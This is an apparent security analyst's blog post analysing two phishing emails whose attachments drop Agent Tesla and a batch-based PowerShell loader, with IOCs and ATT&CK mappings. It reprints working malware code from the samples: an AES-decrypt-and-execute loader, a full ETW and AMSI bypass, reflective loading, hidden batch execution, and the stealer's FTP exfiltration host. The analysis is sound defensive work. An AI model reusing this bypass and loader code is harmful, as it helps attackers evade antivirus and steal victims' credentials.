Introduction
I am working as a Cyber Security Analysis and, inspired by Malware-Traffic-Analysis.net, I decided to start this blog of my own in order to analyse malicious email attachments and links that I receive on my public email address and, in doing so, hone my skills. The blog will be updated whenever I receive a malicious email and have the time to analyse it.
ACKNOWLEDGEMENT OF AMENDED PO NO.: 55963
On March 6 2026, 00:44 UTC, I received an email with the following details:
| From | Subject | Sender address | Sender IP |
|---|---|---|---|
| “Ace Exim Pte. Ltd” <export12@bestu-international.shop> | ACKNOWLEDGEMENT OF AMENDED PO NO.: 55963 | export12@bestu-international.shop | 185.117.90.210 |
The email passed authentication checks, including SPF, DMARC, and DKIM. However, the sender domain and IP are listed in email blocklists for spam. Furthermore, the sender impersonates “Ace Exim Pte. Ltd”, a legitimate ship recycling company located in Singapore.
The email contains the following attachment:
| Name | Type | Magic | SHA256 |
|---|---|---|---|
| AMENDED PO NO. 55963.r00 | RAR | RAR archive data, v4, os: Win32 | 756e2527fd5a40547e66224ba0933785 |
Analysis
JScript Dropper
Extracting the attached RAR archive yields the file “AMENDED PO NO. 55963.JS”. This script is heavily obfuscated so I used box-js to execute the file in a local sandbox and extract IOCs. The following operations were identified:
- The script looks for the files
C:\Users\Public\Mands.pngandC:\Users\Public\Vile.png. - If the files exist, they are deleted.
- Text is written to both files using the
ADODB.StreamActiveX object methods1. - Finally, the following command is executed:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Noexit -nop -c iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(('...'.Replace('BHNZISEUX','')))))
The command includes a base64 encoded string (omitted) with the character sequence BHNZISEUX added to it multiple
times for obfuscation. These sequences are removed, the string is decoded, and the resulting expression is invoked.
I used the following CyberChef recipe to decode the payload:
Regular_expression('User defined','\'([A-Za-z0-9+/=]+)\'',false,false,false,false,false,false,'List capture groups')
Find_/_Replace({'option':'Simple string','string':'BHNZISEUX'},'',true,false,false,false)
From_Base64('A-Za-z0-9+/=',true,false)
Decode_text('UTF-16LE (1200)')
PowerShell Loader (part 1)
The resulting script has comments (likely AI generated) which explain its functionality in detail.
- The script defines the following variables:
$inputBase64FilePath: a file path$FONIA1: base64 encoded AES key$FONIA2: base64 encoded AES IV
- It reads the
Mands.pngfile, decodes it as base64, and decrypts it with AES. - It decodes each line as base64 and executes it as a separate command.
# Specify the path to your text file
$inputBase64FilePath = "C:\Users\PUBLIC\Mands.png"
$FONIA1 = "XW/rxEcefeGgLkSZnkuT7xdp4anDC/iUpCgRgENPPto="
$FONIA2 = "kSkHVO9bPsG2F/4Nq5kUBA=="
# Create a new AES object
$aes_var = [System.Security.Cryptography.Aes]::Create()
# Set AES parameters
$aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes_var.Key = [System.Convert]::FromBase64String($FONIA1)
$aes_var.IV = [System.Convert]::FromBase64String($FONIA2)
# Read the Base64-encoded encrypted data
$base64String = [System.IO.File]::ReadAllText($inputBase64FilePath)
# Convert Base64 string to byte array
$encryptedBytes = [System.Convert]::FromBase64String($base64String)
# Create a MemoryStream from the encrypted byte array
$memoryStream = [System.IO.MemoryStream]::new()
# Write the encrypted bytes to MemoryStream
$memoryStream.Write($encryptedBytes, 0, $encryptedBytes.Length)
$memoryStream.Position = 0 # Reset the position for reading
# Create a decryptor
$decryptor = $aes_var.CreateDecryptor()
# Create a CryptoStream for decryption
$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
# Read the decrypted data from the CryptoStream
$streamReader = New-Object System.IO.StreamReader($cryptoStream)
$decryptedString = $streamReader.ReadToEnd()
# Close streams
$cryptoStream.Close()
$memoryStream.Close()
$streamReader.Close()
# Print the decrypted result
#Write-Output "Decrypted result:"
#Write-Output $decryptedString
# Split the decrypted string into commands assuming they are separated by a newline
#$commands = $decryptedString -split "`n"
# Execute each command
# Split the decrypted string into commands assuming they are separated by a newline
$commands = $decryptedString -split "`n"
# Execute each command
foreach ($encodedCommand in $commands) {
try {
# Trim any whitespace
$encodedCommand = $encodedCommand.Trim()
# Validate command (optional, adjust as needed)
if (-not [string]::IsNullOrWhiteSpace($encodedCommand)) {
# Validate if it is a Base64 string
if ($encodedCommand -match '^[A-Za-z0-9+/=]+$' -and ($encodedCommand.Length % 4 -eq 0)) {
# Decode the Base64 command
$decodedCommand = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encodedCommand))
# Write-Host "done"
# Execute the decoded command
Invoke-Expression $decodedCommand
} else {
# Write-Host "Skipped invalid Base64 command: $encodedCommand"
}
} else {
# Write-Host "Skipped an empty command."
}
} catch {
# Write-Host ("Error executing command: {0}" -f $_.Exception.Message)
}
}
ETW / AMSI Bypass
In order to decode and decrypt the contents of the Mands.png file, I used the following CyberChef recipe:
From_Base64('A-Za-z0-9+/=',true,false)
AES_Decrypt({'option':'Base64','string':'XW/rxEcefeGgLkSZnkuT7xdp4anDC/iUpCgRgENPPto='},{'option':'Base64','string':'kSkHVO9bPsG2F/4Nq5kUBA=='},'CBC','Raw','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''})
From_Base64('A-Za-z0-9+/=',true,false)
Decode_text('UTF-16LE (1200)')
This resulted in another base64 encoded command obfuscated with HWEAAAJJHWEAAA character sequences, which I then decoded with the following recipe:
Regular_expression('User defined','\'([A-Za-z0-9+/=]+)\'',false,false,false,false,false,false,'List capture groups')
Find_/_Replace({'option':'Simple string','string':'HWEAAAJJHWEAAA'},'',true,false,false,false)
From_Base64('A-Za-z0-9+/=',true,false)
Decode_text('UTF-16LE (1200)')
The resulting script implements multiple techniques to evade detection by Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI). At first, it defines memory-related constants, functions, and boilerplate reflection code.
$PAGE_READONLY = 0x02
$PAGE_READWRITE = 0x04
$PAGE_EXECUTE_READWRITE = 0x40
$PAGE_EXECUTE_READ = 0x20
$PAGE_GUARD = 0x100
$MEM_COMMIT = 0x1000
$MAX_PATH = 260
function IsReadable($protect, $state) {
return ((($protect -band $PAGE_READONLY) -eq $PAGE_READONLY -or ($protect -band $PAGE_READWRITE) -eq $PAGE_READWRITE -or ($protect -band $PAGE_EXECUTE_READWRITE) -eq $PAGE_EXECUTE_READWRITE -or ($protect -band $PAGE_EXECUTE_READ) -eq $PAGE_EXECUTE_READ) -and ($protect -band $PAGE_GUARD) -ne $PAGE_GUARD -and ($state -band $MEM_COMMIT) -eq $MEM_COMMIT)
}
if ($PSVersionTable.PSVersion.Major -gt 2) {
$DynAssembly = New-Object System.Reflection.AssemblyName("Win32")
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("Win32", $False)
$TypeBuilder = $ModuleBuilder.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
$MEMORY_INFO_BASIC_STRUCT = $TypeBuilder.CreateType()
$TypeBuilder = $ModuleBuilder.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]$TypeBuilder.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]$TypeBuilder.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
$SYSTEM_INFO_STRUCT = $TypeBuilder.CreateType()
$TypeBuilder = $ModuleBuilder.DefineType("Win32.Kernel32", "Public, Class")
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError")
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, "kernel32.dll", [Reflection.FieldInfo[]]@($SetLastError), @($True))
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("VirtualProtect", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [bool], [Type[]]@([IntPtr], [IntPtr], [Int32], [Int32].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetCurrentProcess", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@(), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("VirtualQuery", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@([IntPtr], [Win32.MEMORY_INFO_BASIC].MakeByRefType(), [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetSystemInfo", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [void], [Type[]]@([Win32.SYSTEM_INFO].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetMappedFileName", "psapi.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [System.Text.StringBuilder], [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("ReadProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("WriteProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetProcAddress", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@([IntPtr], [string]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetModuleHandle", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@([string]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$Kernel32 = $TypeBuilder.CreateType()
try { $ExecutionContext.SessionState.LanguageMode = 'FullLanguage' } catch { }
try { Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser -Force -ErrorAction SilentlyContinue } catch { }
Then, it locates and patches the EtwEventWrite function, which is responsible for event logging,
with shellcode so that it returns immediately, thus preventing event-based rules from being triggered.
$etwAddr = [Win32.Kernel32]::GetProcAddress([Win32.Kernel32]::GetModuleHandle("ntdll.dll"), "EtwEventWrite")
if ($etwAddr -ne [IntPtr]::Zero) {
$oldProtect = 0
$patchSize = if ([Environment]::Is64BitProcess) { 1 } else { 3 }
$patchBytes = if ([Environment]::Is64BitProcess) { @(0xC3) } else { @(0xC2, 0x14, 0x00) }
if ([Win32.Kernel32]::VirtualProtect($etwAddr, $patchSize, 0x40, [ref]$oldProtect)) {
[System.Runtime.InteropServices.Marshal]::Copy($patchBytes, 0, $etwAddr, $patchSize)
[Win32.Kernel32]::VirtualProtect($etwAddr, $patchSize, $oldProtect, [ref]$oldProtect)
}
}
Then, it attempts to patch the amsiSession and amsiContext fields of the AmsiUtils assembly.
This technique breaks PowerShell script scanning, at least in older implementations2.
try {
$amsiUtils = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
if ($amsiUtils) {
$amsiUtils.GetField('amsiSession','NonPublic,Static').SetValue($null, $null)
$amsiUtils.GetField('amsiContext','NonPublic,Static').SetValue($null, [IntPtr]::Zero)
}
} catch { }
Also, it attempts to delete the registry keys under HKLM:\SOFTWARE\Microsoft\AMSI\Providers.
This technique requires elevated privileges but, if it succeeds, all antimalware products
that are registered as AMSI providers are deregistered, effectively disabling script scanning.
try {
if (Test-Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue) {
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue | ForEach-Object { Remove-Item $_.PSPath -Recurse -Force -ErrorAction SilentlyContinue }
}
} catch { }
Finally, it moves on to a more sophisticated technique which disables AMSI by hiding the AmsiScanBuffer
function from the .NET Common Language Runtime (CLR)3. This function is responsible for scanning buffers
to determine if they contain malware. The CLR dynamically resolves the location of the function and exits
gracefully if it cannot be found, in which case .NET binaries can be loaded reflectively without being scanned.
- The script loops through each memory region.
- It finds the memory region that maps to
clr.dll. - It finds the location of the “AmsiScanBuffer” string.
- It adds write permissions to the memory region.
- It overwrites the target string with zeroes.
- Finally, it restores the original memory positions.
To avoid AMSI detecting the “AmsiScanBuffer” string in this script, it is split into four variables.
$a = "Ams"
$b = "iSc"
$c = "anBuf"
$d = "fer"
$signature = [System.Text.Encoding]::UTF8.GetBytes($a + $b + $c + $d)
$hProcess = [Win32.Kernel32]::GetCurrentProcess()
$sysInfo = New-Object Win32.SYSTEM_INFO
[void][Win32.Kernel32]::GetSystemInfo([ref]$sysInfo)
$clrModules = [System.Collections.ArrayList]::new()
$address = [IntPtr]::Zero
$memInfo = New-Object Win32.MEMORY_INFO_BASIC
$pathBuilder = New-Object System.Text.StringBuilder $MAX_PATH
$maxAddr = $sysInfo.lpMaximumApplicationAddress.ToInt64()
while ($address.ToInt64() -lt $maxAddr) {
$queryResult = [Win32.Kernel32]::VirtualQuery($address, [ref]$memInfo, [System.Runtime.InteropServices.Marshal]::SizeOf($memInfo))
if ($queryResult) {
if ((IsReadable $memInfo.Protect $memInfo.State) -and ($memInfo.RegionSize.ToInt64() -gt 0x1000)) {
[void]$pathBuilder.Clear()
$mappedResult = [Win32.Kernel32]::GetMappedFileName($hProcess, $memInfo.BaseAddress, $pathBuilder, $MAX_PATH)
if ($mappedResult -gt 0) {
if ($pathBuilder.ToString().EndsWith("clr.dll", [StringComparison]::InvariantCultureIgnoreCase)) {
[void]$clrModules.Add($memInfo)
}
}
}
}
$address = New-Object IntPtr($memInfo.BaseAddress.ToInt64() + $memInfo.RegionSize.ToInt64())
}
$maxBufferSize = 0x100000
$sigLen = $signature.Length
$buffer = New-Object byte[] $maxBufferSize
$replacement = New-Object byte[] $sigLen
$bytesRead = 0
$bytesWritten = 0
foreach ($region in $clrModules) {
$regionSize = $region.RegionSize.ToInt64()
$processed = 0
while ($processed -lt $regionSize) {
$chunkSize = [Math]::Min($maxBufferSize, $regionSize - $processed)
$currentAddr = [IntPtr]::Add($region.BaseAddress, $processed)
$readResult = [Win32.Kernel32]::ReadProcessMemory($hProcess, $currentAddr, $buffer, $chunkSize, [ref]$bytesRead)
if ($readResult -and $bytesRead -gt $sigLen) {
$searchLimit = $bytesRead - $sigLen
for ($k = 0; $k -le $searchLimit; $k += 4) {
if ($buffer[$k] -eq $signature[0]) {
$found = $true
for ($m = 1; $m -lt $sigLen; $m++) {
if ($buffer[$k + $m] -ne $signature[$m]) {
$found = $false
break
}
}
if ($found) {
$targetAddr = [IntPtr]::Add($currentAddr, $k)
$oldProtect = 0
$protectResult = [Win32.Kernel32]::VirtualProtect($targetAddr, $sigLen, $PAGE_EXECUTE_READWRITE, [ref]$oldProtect)
if ($protectResult) {
[void][Win32.Kernel32]::WriteProcessMemory($hProcess, $targetAddr, $replacement, $sigLen, [ref]$bytesWritten)
[void][Win32.Kernel32]::VirtualProtect($targetAddr, $sigLen, $oldProtect, [ref]$oldProtect)
return
}
}
}
}
}
$processed += $chunkSize
}
}
}
PowerShell Loader (part 2)
After executing the previous script to bypass ETW and AMSI, the loader moves on to
the Vile.png file, which is decoded and decrypted much like the Mands.png file.
The result in this case is a .NET executable which is loaded reflectively and executed.
# Input Base64 encrypted file path
$inputBase64FilePath = "C:\Users\PUBLIC\Vile.png"
# Create a new AES object
$aes_var = [System.Security.Cryptography.Aes]::Create()
# Set AES parameters
$aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes_var.Key = [System.Convert]::FromBase64String($FONIA1) # Your AES key
$aes_var.IV = [System.Convert]::FromBase64String($FONIA2) # Your IV
# Read the Base64-encoded encrypted data
$base64String = [System.IO.File]::ReadAllText($inputBase64FilePath)
# Convert Base64 string to byte array
$encryptedBytes = [System.Convert]::FromBase64String($base64String)
# Create a MemoryStream from the encrypted byte array
$memoryStream = [System.IO.MemoryStream]::new()
$memoryStream.Write($encryptedBytes, 0, $encryptedBytes.Length)
$memoryStream.Position = 0 # Reset the position for reading
# Create a decryptor
$decryptor = $aes_var.CreateDecryptor()
# Create a CryptoStream for decryption
$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
# Decrypt the data into a MemoryStream (no file output)
$decryptedMemoryStream = [System.IO.MemoryStream]::new()
try {
$buffer = New-Object byte[] 4096
$bytesRead = 0
while (($bytesRead = $cryptoStream.Read($buffer, 0, $buffer.Length)) -gt 0) {
$decryptedMemoryStream.Write($buffer, 0, $bytesRead)
}
$decryptedMemoryStream.Position = 0
} catch {
# Write-Host ("Error during decryption: {0}" -f $_)
} finally {
$cryptoStream.Close()
$memoryStream.Close()
}
# Load the decrypted executable from memory
try {
$decryptedBytes = $decryptedMemoryStream.ToArray()
$decryptedMemoryStream.Close()
# Attempt to load as an assembly
$assembly = [Reflection.Assembly]::Load($decryptedBytes)
#Write-Host "Assembly loaded successfully. Running..."
# Invoke the entry point
$entryPoint = $assembly.EntryPoint
if ($entryPoint -ne $null) {
# Create an array of parameters to pass to the main method
$params = @()
$entryPoint.Invoke($null, $params)
} else {
# Write-Host "No entry point found in assembly."
}
} catch {
# Write-Host ("Failed to load assembly: {0}" -f $_)
}
Agent Tesla
Finally, after having decrypted the executable, I decompiled it using dnSpyEx and started analysing the code.
The Properties/AssemblyInfo.cs file contains the following metadata,
which indicates the executable is masquerading as a Python setup:
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: Guid("ac817265-7162-4840-9799-486144a753d9")]
[assembly: AssemblyCopyright("Copyright (c) Python Software Foundation. All rights reserved.")]
[assembly: AssemblyTrademark("Python Software Foundation")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyProduct("Python 3.11.3 (64-bit)")]
[assembly: AssemblyCompany("Python Software Foundation")]
[assembly: AssemblyDescription("Python 3.11.3 (64-bit)")]
[assembly: AssemblyTitle("setup")]
The f45b853c-c9d3-495e-9acb-d41a4a90029f.csproj project file identifies the assembly name of the
executable as f45b853c-c9d3-495e-9acb-d41a4a90029f. A review of the code files, and in particular
the configuration class, indicates that this sample is an Agent Tesla Remote Access Trojan.
The configuration dictates which operations are enabled or disabled:
-
PublicIpAddressGrab -
EnableKeylogger -
EnableScreenLogger -
EnableClipboardLogger -
EnableTorPanel -
EnableCookies -
EnableContacts -
DeleteBackspace -
AppAddStartup -
HideFileStartup -
HostEdit
The PublicIpAddressGrab configuration variable enables sending a request to a service
like IP-API.com to retrieve the public IP address of the machine. However, the IpApi
configuration variable is set to an empty string so this operation is effectively disabled.
It’s worth noting that a request is made to “http://ip-api.com/line/?fields=hosting” in order to identify whether the IP address belongs to a hosting provider, but the result does not include the IP itself. Also, the user agent of HTTP(S) requests is set to “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0”, to masquerade the network traffic as originating from a Firefox 99 browser on a Windows 10 device.
The EnableCookies variable enables exfiltration of browser credentials from several browsers.
However, it is not accessed anywhere in the code so this operation seems to be disabled.
The EnableContacts variable enables exfiltration of contacts from the Thunderbird mail client.
Thunderbird stores this data in the “identities” table of the “global-messages-db.sqlite” file.
The HostEdit variable enables editing the hosts file, which may be used to redirect popular
domains to malicious IP addresses. However, no redirects are actually configured, as indicated
by the text variable being empty in the relevant function:
string text = "";
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
string text2 = Path.Combine(folderPath, "\\drivers\\etc\\hosts");
File.AppendAllText(text2, string.Join(Environment.NewLine, text.Split(new char[] { ',' })));
Browser passwords from several browsers are exfiltrated by default and not controlled by the configuration.
The data exfiltration occurs over FTP towards the domain identified by the FtpHost configuration variable:
public static string FtpHost = "ftp://ftp.martexbuilt.com.au";
Indicators of Compromise
| Type | Value | Links | Comment |
|---|---|---|---|
| export12@bestu-international.shop | N/A | Sender address | |
| Domain | bestu-international.shop | MXToolBox VirusTotal | Sender domain |
| Domain | ftp.martexbuild.com.au | VirusTotal | C2 server |
| IP | 185.117.90.210 | AbuseIPDB | Sender IP |
| Hash | 756e2527fd5a40547e66224ba0933785 | VirusTotal ANY.RUN | AMENDED PO NO. 55963.r00 |
| Hash | 9be483c90186e01bcbf15272b9563385 | VirusTotal Triage | AMENDED PO NO. 55963.JS |
| Hash | 3638971ea743e157e4f3cd05f91055d2 | N/A | Mands.png (encrypted) |
| Hash | 3dc07bd0d06871debc2fca7e38310e29 | VirusTotal | ETW / AMSI bypass |
| Hash | 59ce20dd1fc5baca48a92244368b5e94 | N/A | Vile.png (encrypted) |
| Hash | fc640a2a31dce7882edbc7ef4c8ce69c | VirusTotal Hybrid Analysis | Agent Tesla |
MITRE ATT&CK® Techniques
| Tactic | Technique |
|---|---|
| Initial Access | T1566.001 - Phishing: Spearphishing Attachment |
| Execution | T1204.002 - User Execution: Malicious File |
| Execution | T1059.007 - Command and Scripting Interpreter: JavaScript |
| Execution | T1059.001 - Command and Scripting Interpreter: PowerShell |
| Defense Evasion | T1036.008 - Masquerading: Masquerade File Type |
| Defense Evasion | T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File |
| Defense Evasion | T1562.001 - Impair Defenses: Disable or Modify Tools |
| Defense Evasion | T1620 - Reflective Code Loading |
| Credential Access | T1555.003 - Credentials from Password Stores: Credentials from Web Browsers |
| Exfiltration | T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol |
FIYAT TEKLIFI
On April 13 2026, 10:37 UTC, I received an email with the following details:
| From | Subject | Sender address | Sender IP |
|---|---|---|---|
| Abm Ship Supply <abm@abmshipsupply.com> | FIYAT TEKLIFI | abm@abmshipsupply.com | 158.94.208.218 |
The subject is in Turkish and translates to “PRICE OFFER”.
The sender domain has not configured DMARC or DKIM and the SPF check failed, which indicates that the email was likely spoofed. The website belongs to “ABM Ship Supply”, a Turkish marine supply provider, and the sender address is listed in their contacts.
The email contains the following attachment:
| Name | Type | Magic | SHA256 |
|---|---|---|---|
| Abm 2026 H1 G�ncel Fiyat Listesi .r07 | RAR | RAR archive data, v5 | 0b05ceeae3be9bb1b83bb079e4a58421 |
Analysis
.NET Initial Dropper
Extracting the attached RAR archive yields the 32-bit .NET executable “Abm 2026 H1 Güncel Fiyat Listesi .exe” with the following metadata:
- File Description: Stub
- File Version: 1.0.0.0
- Internal Name: stub.exe
- Legal Copyright: Copyright © 2025
- Original File Name: stub.exe
- Product Name: Stub
- Product Version: 1.0.0.0
- Assembly Version: 1.0.0.0
I decompiled the executable with ILSpy
and identified the assembly name “GeneratedExe” and entry point Program.Main.
The entry point contains junk code which filters, transforms, and prints a hardcoded list of numbers. I’ve omitted this code as its only purpose is to obfuscate the malware’s functionality in an attempt to hinder static code analysis.
Alongside the junk code, it initializes an array of 13650 bytes which it writes to a “.bat” file in a temporary folder with a randomly-generated UUID as the filename. The file is executed through “cmd.exe” on a hidden window with all output captured and discarded. The program waits for the process execution to finish and deletes the file it created to hide its tracks.
byte[] bytes = new byte[13650] {
// ...
};
// junk code
string text = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString() + ".bat");
try {
File.WriteAllBytes(text, bytes);
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "cmd.exe";
processStartInfo.Arguments = "/C \"" + text + "\"";
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
processStartInfo.CreateNoWindow = true;
processStartInfo.UseShellExecute = false;
processStartInfo.RedirectStandardOutput = true;
processStartInfo.RedirectStandardError = true;
ProcessStartInfo startInfo = processStartInfo;
// junk code
using (Process process = Process.Start(startInfo)) {
string text2 = process.StandardOutput.ReadToEnd();
string text3 = process.StandardError.ReadToEnd();
process.WaitForExit();
}
// junk code
}
finally {
try {
File.Delete(text);
} catch { }
}
// junk code
Batch File Loader
Since the byte array is not obfuscated in any way, it can be decoded with a single operation.
From_Decimal('Comma',false)
The batch file starts with a “fake complex header”. The code fakes a system checker utility and pings the loopback address a few times while printing messages with random numbers. Like the junk code of the first stage, this code is purely a distraction. In fact, it is skipped entirely and never executes.
@echo off
:: ===============================
:: FAKE COMPLEX HEADER - DO NOT RUN
:: ===============================
goto :fakeComplexCodeEnd
:fakeComplexCode
title Ultimate System Checker 9000
:: omitted
:endFakeComplexCode
:fakeComplexCodeEnd
:: ===============================
:: END OF FAKE COMPLEX HEADER
:: =
After the header, begins a series of GOTO statements and labels. Most of the labels contain
a single SET statement each of which defines a variable containing a portion of a command.
GOTO ODIONSOGIF
:: ...
:ODIONSOGIF
SET NDJDNONFNH=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command "S
GOTO DIUJIOGNDS
:: ...
:IGJSIDHDDD0
The execution of the command which is pieced together using these variables can be identified with a little Python code. The code reads the file and looks for a line which follows a label, does not start with “SET”, and is not blank.
from pathlib import Path
import re
text = Path("URT.bat").read_text()
execution = re.search(r"^:[A-Z0-9]+\n(?!SET|\s*$)(.+)$", text, re.M)[1]
After identifying this line, the variables in it can be expanded by looking for the SET statements,
mapping the variable names to their values, and substituting them accordingly.
variables = dict(re.findall(r"^SET (\w+)=(.*)$", text, re.M))
command = re.sub(r"%(\w+)%", lambda m: variables[m[1]], execution)
The resulting command calls PowerShell and does two things:
- It launches a new hidden PowerShell process to execute a base64-encoded command.
- It copies the calling script file to “C:\ProgramData\URT.bat”, ignoring errors.
